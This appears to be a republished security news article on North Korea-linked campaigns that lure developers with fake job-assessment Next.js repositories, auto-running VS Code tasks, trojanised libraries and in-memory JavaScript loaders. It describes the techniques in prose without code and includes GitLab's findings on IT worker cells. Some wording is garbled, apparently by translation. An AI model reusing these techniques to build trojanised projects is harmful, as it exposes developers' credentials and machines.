A “coordinated developer-targeted campaign” uses malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into running the projects and establish permanent access to compromised machines.
“This activity is consistent with a broader group of threats that use job-themed decoys to blend into developers’ daily workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report released this week.
The tech giant said the campaign featured the use of multiple entry points leading to the same outcome, with attacker-controlled JavaScript being captured at runtime and executed to facilitate command and control (C2).
This attack relies on an attacker setting up a fake repository on a trusted developer platform like Bitbucket, using a name like “Cryptan-Platform-MVP1” to trick developers looking for a job into running it as part of their evaluation process.
Further analysis of the identified repositories reveals three distinct execution paths that are triggered in different ways, but with the ultimate goal of executing attacker-controlled JavaScript directly in memory.
Running a Visual Studio Code workspace. It uses a Microsoft Visual Studio Code (VS Code) project with a workspace automation configuration to execute malicious code retrieved from the Vercel domain as soon as the developer opens and trusts the project. This includes configuring the task with runOn: “folderOpen”. Build-time execution during application development. Simply running the development server manually via ‘npm run dev’ activates the execution of malicious code embedded within a modified JavaScript library disguised as jquery.min.js, which fetches the Vercel-hosted JavaScript loader. The retrieved payload is executed in memory by Node.js. Exposing the environment and performing server startup via dynamic remote code execution. Launching the application backend executes malicious loader logic hidden within the backend module or root file. The loader sends the process environment to an external server and executes the JavaScript received in response in memory within the Node.js server process.
Microsoft noted that all three methods lead to the same JavaScript payload that is responsible for profiling the host and periodically polling the registration endpoint to obtain a unique “instanceId” identifier. This identifier is provided on subsequent polls to correlate subsequent activity.
It can also run server-provided JavaScript in memory, paving the way for a second-stage controller that eventually turns the initial foothold into a persistent access path to connect to another C2 server to receive tasks, and execute tasks in memory to minimize any trace left on disk.
Attack chain overview
“This controller maintains stability and session continuity, posts error telemetry to reporting endpoints, and includes retry logic for resiliency,” Microsoft said. “You can also track spawned processes, stop managed activities, and gracefully terminate them on command. Stage 2 goes beyond on-demand code execution to support operator-driven discovery and extraction.”
Although the Windows maker did not attribute this activity to a specific attacker, using VS Code tasks and Vercel domains to stage malware is a tactic that has been employed by North Korea-linked hackers associated with a long-running campaign known as “Contagious Interviews.”
The ultimate goal of these efforts is to gain the ability to deliver malware to developer systems. Developer systems often contain sensitive data such as source code, secrets, and credentials, which can provide an opportunity to penetrate deeper into the target network.
Use GitHub gist with VS Code task.json instead of Vercel URL
Abstract Security said in a report released Wednesday that it has observed a change in threat actor tactics, particularly the proliferation of alternative staging servers used in VS Code task commands in place of Vercel URLs. This includes using scripts hosted on GitHub gists (‘gist.githubusercontent’)[.]com”) to download and execute the next stage payload. Another approach is to use a URL shortener like short.[.]gy to hide Vercel URL.
The cybersecurity firm said it also identified a malicious npm package linked to a campaign named “eslint-validator” that retrieves and executes an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware called BeaverTail.
Additionally, a malicious VS Code task embedded within a GitHub repository has been found to launch a Windows-only infection chain that runs a batch script to download the Node.js runtime (if not present) on the host and utilizes the certutil program to parse blocks of code contained within the script. The decoded script is executed on the previously obtained Node.js runtime to deploy the PyArmor-protected Python malware.
Cybersecurity firm Red Asgard, which has also tracked the campaign extensively, said the attackers leveraged a crafted VS Code project that uses a runOn: “folderOpen” trigger to deploy the malware, thereby querying the Polygon blockchain and retrieving JavaScript stored within the NFT contract to improve resiliency. The final payload is an information stealer that collects credentials and data from web browsers, cryptocurrency wallets, and password managers.
Distribution of staging infrastructure used by North Korean threat actors in 2025
“This developer-focused campaign shows how the hiring-themed ‘interview project’ can become a trusted path to remote code execution by blending into everyday developer workflows like opening repositories, running development servers, and launching backends,” Microsoft concludes.
To combat this threat, the company recommends that organizations strengthen trust boundaries for developer workflows, enforce strong authentication and conditional access, use strict credential hygiene, apply principles of least privilege in building developer accounts and identities, and isolate infrastructure where possible.
The development comes after GitLab announced it had banned 131 unique accounts that were involved in distributing malicious code projects related to the Contagious Interview campaign and the rogue IT worker scheme known as Wagemole.
“Threat actors typically originate from consumer VPNs when communicating with GitLab.com to distribute malware, but intermittently may originate from IP addresses on dedicated VPS infrastructure or perhaps laptop farms,” said GitLab’s Oliver Smith. “In almost 90% of cases, the attacker used a Gmail email address to create the account.”
In more than 80% of cases per software development platform, attackers allegedly leveraged at least six legitimate services to host their malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Of these, Vercel was the most commonly used, with threat actors relying on the web development platform at least 49 times in 2025.
“In December, we observed a group of projects executing malware via VS Code tasks by piping remote content to a native shell or running custom scripts that decoded the malware from binary data in fake font files,” Smith added, corroborating the aforementioned Microsoft findings.
Evaluating the organizational chart of North Korea’s IT worker cells
GitLab also discovered private projects “most likely” controlled by North Koreans who control North Korean IT worker cells, including detailed financial and personnel records showing more than $1.64 million in revenue from Q1 2022 to Q3 2025. The project included over 120 spreadsheets, presentations, and documents that tracked individual team members’ quarterly revenue performance.
“The records demonstrate that these operations operate as structured enterprises with defined goals and operating procedures, and close hierarchical oversight,” GitLab noted. “This cell’s proven ability to develop facilitators around the world provides a high degree of operational resilience and money laundering flexibility.”
GitHub accounts associated with North Korean IT workers
In a report released earlier this month, Okta said the “vast majority” of interviews with IT employees don’t progress to second interviews or offers, but noted that they “learn from their mistakes” and take advantage of the fact that many of them are less likely to conduct rigorous background checks to seek temporary contract work as software developers hired by third-party companies.
“However, some actors seem to be more competent at creating personas and passing screening interviews,” he added. There is a kind of natural selection at work for IT workers. The most successful actors are extremely prolific, each scheduling hundreds of interviews. ”
Source link
